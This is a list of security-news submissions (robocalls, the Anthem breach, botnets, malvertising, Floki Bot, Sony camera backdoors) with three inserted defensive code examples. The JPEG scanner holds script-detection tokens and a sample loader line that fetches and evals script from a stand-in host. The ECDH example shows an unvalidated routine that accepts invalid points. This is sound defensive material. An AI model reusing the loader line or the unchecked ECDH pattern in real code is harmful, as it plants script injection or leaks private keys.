


Submission Summary: 0 pending, 955 declined, 396 accepted (1351 total, 29.31% accepted)


Submission + - FTC Dismantles Two Huge Robocall Organizations

Trailrunner7 writes: Continuing its campaign against phone fraud operations, the FTC has dismantled two major robocall organizations that the commission alleges were making hundreds of millions of calls over the course of several years to consumers who were on the Do Not Call registry.

The FTC filed complaints against two separate groups of defendants, the leaders of which have both been involved in previous legal actions for robocalling operations. The defendants each controlled several different corporate entities that were involved in selling home security systems, extended auto warranties, and other products through repeated automated phone calls. Many of the calls were to numbers on the DNC list, a violation of the telemarketing regulations.

The two main defendants in the complaints are Justin Ramsey and Aaron Michael Jones, and in separate actions, they and many of their co-defendants have agreed to court-ordered bans on robocall activities and financial settlements. The FTC alleges that Ramsey directed an operation that made millions of robocalls a month.

Submission + - Foreign Government Blamed for Huge Anthem Data Breach

Trailrunner7 writes: Attackers backed by a foreign government were behind the attack that compromised health insurance company Anthem in 2015, a breach that compromised the information of more than 78 million people, according to the findings of an investigation into the attack.

The Anthem data breach is one of the larger health care-related incidents ever in the United States and it has cost the company $260 million so far in technology improvements, credit monitoring, and other expenses. Anthem officials discovered the breach in January 2015 and disclosed it publicly the following month. The attack began, as many of the incidents do, with a spearphishing email, which an employee of one of Anthem’s subsidiaries opened. That led to the installation of malware on the employee’s machine, and the attacker then moved on to compromise at least 90 other computers in the organization, according to the report.

Anthem hired security firm CrowdStrike to investigate the intrusion, and the California Department of Insurance conducted an analysis of the event, as well. The analysts came to the conclusion that operators from a foreign government had initiated the attack. The report does not specify which government was involved, however.

Submission + - New Report Will Provide Motive, Details of Russian Hacking Tied to Election

Trailrunner7 writes: In a report to be published next week, the United States intelligence community will provide further support for its assertions that Russian intelligence services compromised government and private networks to influence the November presidential election. The report also will include details on a motive for the hacking campaign.

The new report is the result of an order from President Barack Obama to investigate whether elements of the Russian government hacked U.S. networks in the months leading up to the election. There will be a classified version of the report delivered to Congress, as well as an unclassified version released to the public. In a hearing before the Senate Armed Service Committee Thursday, senior intelligence officials said they are highly confident that Russian intelligence was behind a number of intrusions tied to the election.

“This was a multifaceted campaign. The hacking was only one part of it. It included classical propaganda, fake news, disinformation,” said Director of National Intelligence James Clapper during Thursday’s hearing.

Submission + - New California Law Finally Makes Ransomware Illegal

Trailrunner7 writes: It was nice to see the calendar turn over to 2017, for a lot of reasons, not the least of which is that on Jan. 1 a new law went into effect in California that outlaws the use of ransomware.

The idea of needing a new law to make a form of hacking illegal may seem counterintuitive, but ransomware is a case of criminals outflanking the existing laws. Ransomware emerged in a big way a few years ago and the law enforcement community was not prepared for the explosion of infections. While there have been takedowns of ransomware gangs, they often involve charges of money laundering or other crimes, not the installation of the ransomware itself.

In September, California Gov. Jerry Brown signed into law a bill that made the use of ransomware a crime, essentially a form of extortion. The law went into effect on Jan. 1.

Submission + - FDA Issues Cybersecurity Guidance for Medical Devices

Trailrunner7 writes: The Food and Drug Administration has published new recommendations for both manufacturers and regulators on how to deal with security for medical devices, including implantable devices. Calling device security a shared responsibility, the FDA guidance focuses on the postmarket cybersecurity issues, such as vulnerability response and remediation.

The new document is not a set of regulations, but is simply guidance designed to give manufacturers and regulators a framework for medical device security issues. This topic has become a major concern in the last few years as manufacturers have added networking and other capabilities to more and more medical devices such as insulin pumps and pacemakers.

A large portion of the FDA guidance concerns the ways in which manufacturers assess the potential exploitability of a given vulnerability and how they respond to vulnerability reports. There are well-defined processes for this kind of assessment in the normal software and hardware worlds. But medical devices are a much different story, given their dedicated purposes and the potential consequences if a vulnerability is exploited.

Submission + - New Leet Botnet Rivaling Mirai's DDoS Volume

Trailrunner7 writes: A new botnet that is capable of some of the larger DDoS attacks ever seen has emerged in the last few days, launching floods of up to 650 Gbps and using a unique payload that researchers say is effective at evading security systems.

The network came to light on Dec. 21 when researchers at Imperva saw a two-part DDoS attack that began with a 20-minute flood that peaked around 400 Gbps. A few minutes later, the attackers pushed the button again, this time hitting a peak volume of 650 Gbps and throwing more than 150 million packets per second at the targets. That volume of attack traffic approaches the enormous DDoS floods generated by the Mirai botnet over the last few months. The largest of the known Mirai floods was around 1 Tbps of traffic.

The Imperva researchers said the attacks from the new botnet, which they’ve named Leet, came from spoofed IP addresses and ended after a total of about 37 minutes. Aside from the high volume involved in the attacks, the other interesting piece is the makeup of the packets Leet is sending at its targets. Some of the packets are typical SYN packets, but others are more than 10 times as large as normal packets and include some very odd ingredients.

Submission + - Apple Delays App Store Security Deadline for Developers

Trailrunner7 writes: Apple has pushed back a deadline for developers to support a key transport security technology in apps submitted to the company’s app stores.

Officials said at the Apple Worldwide Developers Conference earlier this year that developers would have to support Apple Transport Security by the end of 2016. But on Thursday, the company announced that it has decided to extend the deadline indefinitely.

ATS is Apple’s collection of transport security standards designed to provide attack resistance for data that’s sent between iOS and macOS apps and back end servers. It requires apps to support a number of modern transport security technologies, including TLS 1.2, AES-128 or stronger, and certificates must be signed using SHA-2. ATS also requires the use of forward secrecy, a key-exchange method that protects encrypted sessions even if the server certificate is compromised at some point in the future.
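The four ATS requirements listed above (TLS 1.2, AES-128 or stronger, SHA-2 certificate signatures, forward secrecy) can be turned into a server-side preflight check. The following is an added example, not code from Apple or from the original post: it takes the parameters a server negotiated, using OpenSSL-style names as printed by `openssl s_client` and `openssl x509 -text`, and reports every rule the configuration breaks. The minimum key sizes are Apple's documented ATS figures, which the summary above does not mention; the inputs in the `__main__` block are constructed.

```python
import re

# Added example: evaluate negotiated TLS parameters against the ATS rules.
# Inputs use OpenSSL-style names ("TLSv1.2", "ECDHE-RSA-AES128-GCM-SHA256",
# "sha256WithRSAEncryption"). Key-size minimums are Apple's documented ATS
# values, an addition beyond the four rules the summary lists.

RSA_MIN_BITS, EC_MIN_BITS = 2048, 256


def check_ats(tls_version, cipher_suite, cert_signature, key_bits, key_type="RSA"):
    """Return (compliant, problems). Every rule is checked independently so the
    caller sees everything that needs fixing, not just the first failure."""
    problems = []

    # 1. Protocol: TLS 1.2 or later. "TLSv1" (no minor) means TLS 1.0.
    m = re.fullmatch(r"TLSv(\d)(?:\.(\d))?", tls_version)
    version = (int(m[1]), int(m[2] or 0)) if m else (0, 0)
    if version < (1, 2):
        problems.append(f"protocol {tls_version} is older than TLS 1.2")

    # 2. Forward secrecy: on TLS 1.2 ATS accepts only ECDHE suites; every
    #    TLS 1.3 suite uses an ephemeral exchange by construction.
    suite = cipher_suite.upper()
    if version < (1, 3) and not suite.startswith("ECDHE-"):
        problems.append(f"{cipher_suite} lacks forward secrecy (ECDHE required)")

    # 3. Bulk cipher: AES-128 or AES-256 (GCM preferred, CBC accepted).
    #    RC4, 3DES and non-AES AEADs fail this rule.
    if not re.search(r"AES[_-]?(128|256)[_-](GCM|CBC|SHA)", suite):
        problems.append(f"{cipher_suite} does not use AES-128 or stronger")

    # 4. Certificate signature: SHA-2 family only, never SHA-1 or MD5.
    if not re.search(r"sha(256|384|512)", cert_signature, re.IGNORECASE):
        problems.append(f"certificate signed with {cert_signature}; SHA-2 required")

    # 5. Key size (documented ATS minimums, not from the summary above).
    minimum = EC_MIN_BITS if key_type.upper() in ("EC", "ECDSA") else RSA_MIN_BITS
    if key_bits < minimum:
        problems.append(f"{key_type} key of {key_bits} bits is below the {minimum}-bit minimum")

    return (not problems, problems)


if __name__ == "__main__":
    # Constructed inputs: a legacy configuration beside its corrected form.
    for args in [("TLSv1", "AES128-SHA", "sha1WithRSAEncryption", 1024),
                 ("TLSv1.2", "ECDHE-RSA-AES128-GCM-SHA256", "sha256WithRSAEncryption", 2048)]:
        ok, why = check_ats(*args)
        print(args[1], "->", "ATS-compliant" if ok else "; ".join(why))
```

Feed it the values from `openssl s_client -connect host:443 -tls1_2` (the `Protocol` and `Cipher` lines) and from the certificate's `Signature Algorithm` and `Public-Key` fields; a server that passes here still has to present a certificate chain the device trusts.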

Submission + - House Working Group Says Weakening Crypto Would Hurt U.S. Security

Trailrunner7 writes: In a year-end report, a key congressional working group on encryption said that any governmental initiative to backdoor encryption systems is against the interests of the country and that there is no clear solution to the battle over encryption right now.

The Encryption Working Group, comprised of members of the House Judiciary Committee and House Energy and Commerce Committee, has been looking at the challenges that law enforcement and intelligence communities face with the wide deployment of strong encryption. The group said in its report that although encrypted communications present a serious obstacle for law enforcement agencies, officials in the national security community said encryption is a key part of protecting the nation’s critical infrastructure.

“Congress should not weaken this vital technology because doing so works against the national interest. However, it should not ignore and must address the legitimate concerns of the law enforcement and intelligence communities,” the report says.

Submission + - Google Releases Tool to Find Common Crypto Bugs

Trailrunner7 writes: Google has released a new set of tests it uses to probe cryptographic libraries for vulnerabilities to known attacks. The tests can be used against most kinds of crypto algorithms and the company already has found 40 new weaknesses in existing algorithms.

The tests are called Project Wycheproof, and Google’s engineers designed them to help developers implement crypto libraries without having to become experts. Cryptographic libraries can be quite difficult to implement and making errors can lead to serious security problems. Attackers often will look for weak crypto implementations as a means of circumventing strong encryption in a target app.

Among the issues that Google’s engineers found with the Project Wycheproof tests is one in ECDH that allows an attacker to recover the private key in some circumstances. The bug is the result of some libraries not checking the elliptic curve points that they get from outside sources.
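The ECDH weakness described above comes down to one missing check: the point the peer sends must actually lie on the agreed curve. The group-law formulas never use the curve's b coefficient, so arithmetic on a point from some other curve y^2 = x^3 + ax + b' proceeds silently, and an attacker who chooses b' so that the point has small order learns the private scalar modulo that order from the resulting "shared secret". The block below is an added example, not Google's Wycheproof code or any library's: it implements textbook affine P-256 arithmetic, the on-curve check, and an ECDH routine with and without validation. The curve constants are the public NIST P-256 domain parameters; the private scalars in `demo()` are constructed for the demo and are not real keys.

```python
# Added example: validating a peer's ECDH public point before using it.
# Curve constants are the public NIST P-256 parameters; demo keys are
# constructed and are not real secrets.

P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
# The point at infinity is represented as None.


def is_on_curve(point):
    """True iff point is affine, has coordinates in [0, p) and satisfies
    y^2 = x^3 + ax + b (mod p). None (infinity) is rejected: it is never a
    legitimate peer key."""
    if point is None:
        return False
    x, y = point
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Group law in affine coordinates. Note that b never appears here: the
    same arithmetic 'works' on any curve y^2 = x^3 + ax + b', which is
    exactly what an invalid-curve attack relies on."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, point):
    """Double-and-add (not constant time; adequate for a validation demo)."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def unchecked_ecdh(private_key, peer_public):
    """What a library that skips point validation effectively does."""
    return scalar_mult(private_key, peer_public)


def ecdh_shared_secret(private_key, peer_public):
    """Validated ECDH: refuse anything that is not a point on P-256, then
    return the x-coordinate of d*Q as the raw shared secret."""
    if not 1 <= private_key < N:
        raise ValueError("private key out of range")
    if not is_on_curve(peer_public):
        raise ValueError("peer public key is not a point on P-256")
    shared = scalar_mult(private_key, peer_public)
    if shared is None:
        raise ValueError("shared point is the identity")
    return shared[0]


def demo():
    """Agreement succeeds with honest keys; a tampered point is refused.
    Returns True when the validated routine rejects the bogus point."""
    alice_priv = 0x1f3c9a7e5d2b8460ac13e77f0b2d9e44c6a1f8b3d5e7092c4a6b8d0e1f2a3b4c
    bob_priv = 0x7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6b
    alice_pub = scalar_mult(alice_priv, G)
    bob_pub = scalar_mult(bob_priv, G)
    assert ecdh_shared_secret(alice_priv, bob_pub) == ecdh_shared_secret(bob_priv, alice_pub)
    # Attacker keeps Bob's x but tweaks y: not on P-256, yet the unchecked
    # arithmetic still yields a number derived from alice_priv.
    bogus = (bob_pub[0], (bob_pub[1] + 1) % P)
    assert unchecked_ecdh(alice_priv, bogus) is not None
    try:
        ecdh_shared_secret(alice_priv, bogus)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("invalid point rejected:", demo())
```

In a real library the same check belongs wherever an externally supplied point is deserialized (raw, X9.63 or ASN.1 encodings alike), and for curves whose order is not prime the cofactor must be handled as well; P-256 has cofactor 1, so the on-curve test is sufficient here.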

Submission + - 70 Percent of Enterprise Ransomware Victims Paid Up

Trailrunner7 writes: Ransomware gangs have been targeting businesses in the last few months, seeking bigger paydays than what they can extract from consumers. The plan has been highly successful, according to new data, which shows that 70 percent of businesses infected with ransomware have paid the ransom to get their data back.

Researchers at IBM Security’s X-Force surveyed executives at 600 businesses of all sizes and found that organizations hit with ransomware are choosing to pay out at a high rate. The data shows that 20 percent of compromised organizations have paid ransoms of more than $40,000, and 25 percent have paid between $20,000 and $40,000. Those numbers are far higher than what consumers typically pay, which is usually in the range of $500-$1,000, depending on the ransomware variant.

Submission + - New Wave of Malvertising Targets Home Routers, Changes DNS Servers

Trailrunner7 writes: There’s a new malvertising campaign that is attacking Chrome users on both desktops and mobile devices and is exploiting victims’ home routers through the use of the DNSChanger exploit kit. The attacks have been going on for several weeks and researchers say they’re targeting several brands of routers, including D-Link, Netgear, and others.

The attackers behind this campaign are using malicious ads on a number of legitimate websites to redirect visitors to a site that serves the exploit kit. At the start of the attack, the kit does some fingerprinting of the client and looks up its IP address to see if it’s in the range of targeted IPs. If so, it then shows the victim the malicious advertisement and uses JavaScript to pull some code from the comment field of an image in the ad. That code then sends the victim to the DNSChanger landing page. The exploit kit then loads a long encrypted list of router fingerprints and a key to decrypt them.

The kit then uses the victim’s browser to identify the home router and fingerprint it and then send the details back to the remote server. The server will then send back instructions on how to exploit that particular router. Once that's done, the malware will change the DNS server and redirect victims' web traffic.
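The campaign described above stages its first script inside the comment field of an image, where ad-network scanners that only look at the HTML and JavaScript of a creative will not see it. The following is an added example, not code from the researchers or from the original post: a small JPEG marker-segment parser that pulls out COM and APPn segments and flags ones carrying script-like text or an implausibly long comment. The post does not say which image format the kit used, so JPEG is an assumption; the sample images are constructed byte strings built by `build_sample_jpeg`, not captures from the campaign.

```python
import struct

# Added example: scan a JPEG's comment/application segments for hidden script.
# Sample images are constructed inline; JPEG as the carrier is an assumption.

SOS, EOI, COM = 0xDA, 0xD9, 0xFE
APP_MARKERS = range(0xE0, 0xF0)          # APP0..APP15 (JFIF, EXIF, XMP, ...)
STANDALONE = {0x01, *range(0xD0, 0xD8)}  # TEM and RST0..RST7 carry no length
SUSPICIOUS = (b"<script", b"eval(", b"function(", b"document.", b"window.",
              b"fromcharcode", b"unescape(", b"http://", b"https://")
MAX_BENIGN_COMMENT = 256                 # longer than any normal tool banner


def jpeg_segments(data):
    """Yield (marker, offset, payload) for every marker segment before the
    entropy-coded scan data (SOS). Raises ValueError on structural errors."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker; not a JPEG")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                # padding byte, keep scanning
            pos += 1
            continue
        if marker in (SOS, EOI):          # scan data or end: header parsing is done
            return
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length at offset {pos}")
        yield marker, pos, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def find_hidden_scripts(data):
    """Return findings for COM/APPn segments that look like they carry
    JavaScript rather than a tool banner or image metadata."""
    findings = []
    for marker, offset, payload in jpeg_segments(data):
        if marker != COM and marker not in APP_MARKERS:
            continue
        lowered = payload.lower()
        tokens = [t.decode() for t in SUSPICIOUS if t in lowered]
        reasons = []
        if tokens:
            reasons.append("script-like tokens: " + ", ".join(tokens))
        if marker == COM and len(payload) > MAX_BENIGN_COMMENT:
            reasons.append(f"oversized comment ({len(payload)} bytes)")
        if reasons:
            findings.append({
                "marker": "COM" if marker == COM else f"APP{marker - 0xE0}",
                "offset": offset,
                "reasons": reasons,
                "snippet": payload[:60].decode("latin-1"),
            })
    return findings


def build_sample_jpeg(comment):
    """Constructed minimal JPEG header: SOI, a JFIF APP0 stub, one COM segment
    carrying `comment`, then EOI. Enough to parse; not a decodable image."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


if __name__ == "__main__":
    # Constructed payload in the style of a loader stub; the host is a reserved .invalid name.
    stub = b"var s=document.createElement('script');s.src='http://example.invalid/lp.js';eval(s.text)"
    for hit in find_hidden_scripts(build_sample_jpeg(stub)):
        print(hit)
```

Run it over every creative before it is served; real images from editing tools carry short ASCII banners ("Created with GIMP") or EXIF/XMP blocks, so anything that trips the token list deserves a manual look rather than an automatic pass.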

Submission + - Zeus Still Alive and Well With New Variant Floki Bot

Trailrunner7 writes: Malware gangs, like sad wedding bands, love to play the hits. And one of the hits they keep running back over and over is the Zeus banking Trojan, which has been in use for many years in a number of different forms. Researchers have unearthed a new piece of malware called Floki Bot that is based on the venerable Zeus source code and is being used to infect point-of-sale systems, among other targets.

Flashpoint conducted the analysis of Floki Bot with Cisco’s Talos research team, and the two organizations said that the author behind the bot maintains a presence on a number of different underground forums, some of which are in Russian or other non-native languages for him. Kremez said that attackers sometimes will participate in foreign language forums as a way to expand their knowledge.

Along with its PoS infection capability, Floki Bot also has a feature that allows it to use the Tor network to communicate.

Submission + - Flash Bugs Dominate Exploit Kit Landscape

Trailrunner7 writes: Vulnerabilities in Flash and Internet Explorer dominated the exploit kit landscape in the last year, with a high-profile bug in Flash being found in seven separate kits, new research shows.

Exploit kits have long been a key tool in the arsenal of many attackers, from low-level gangs to highly organized cybercrime crews. Their attraction stems from their ease of use and the ability for attackers to add exploits for new vulnerabilities as needed. While there are dozens of exploit kits available, a handful of them attract the most use and attention, including Angler, Neutrino, Nuclear, and Rig. Researchers at Recorded Future looked at more than 140 exploit kits and analyzed which exploits appeared in the most kits in the last year, and it’s no surprise that Flash and IE exploits dominated the landscape.

Six of the top 10 most-frequently targeted vulnerabilities in the last year were in Flash, while the other four were in Microsoft products, including IE, Windows, and Silverlight. Flash has been a favorite target for attackers for a long time, for two main reasons: it’s deployed on hundreds of millions of machines, and it has plenty of vulnerabilities. Recorded Future’s analysis shows that trend is continuing, and one Flash bug disclosed in October 2015 was incorporated into seven individual exploit kits. The flaw was used by a number of high-level attackers, including some APT groups.

Submission + - Two Backdoors Found in Sony IP Cameras

Trailrunner7 writes: A long list of IP-enabled security cameras made by Sony contain backdoors in their firmware that can allow an attacker to run arbitrary code remotely on the devices and potentially open them up for use in a botnet.

The cameras affected by the vulnerabilities are surveillance cameras, mainly used in enterprise and retail settings, and there are dozens of models that contain the vulnerable firmware. Researchers at SEC Consult discovered the backdoors and found that an attacker could use one of them to enable hidden Telnet and SSH services on the cameras and then use the other backdoor to gain root privileges.

“After enabling Telnet/SSH, another backdoor allows an attacker to gain access to a Linux shell with root privileges! The vulnerabilities are exploitable in the default configuration over the network. Exploitation over the Internet is possible, if the web interface of the device is exposed," the researchers said.

Submission + - New Google Trusted Contacts Service Shares User Location in Real Time

Trailrunner7 writes: Google has spent a lot of time and money on security over the last few years, developing new technologies and systems to protect users’ devices. One of the newer technologies the company has come up with is designed to provide security for users themselves rather than their laptops or phones.

On Monday Google launched a new app for Android called Trusted Contacts that allows users to share their locations and some limited other information with a set of close friends and family members. The system is a two-way road, so a user can actively share her location with her Trusted Contacts, and stop sharing it at her discretion. But, when a problem or potential emergency comes up, one of those contacts can request to get that user’s location to see where she is at any moment. The app is designed to give users a way to reassure contacts that they’re safe, or request help if there’s something wrong.
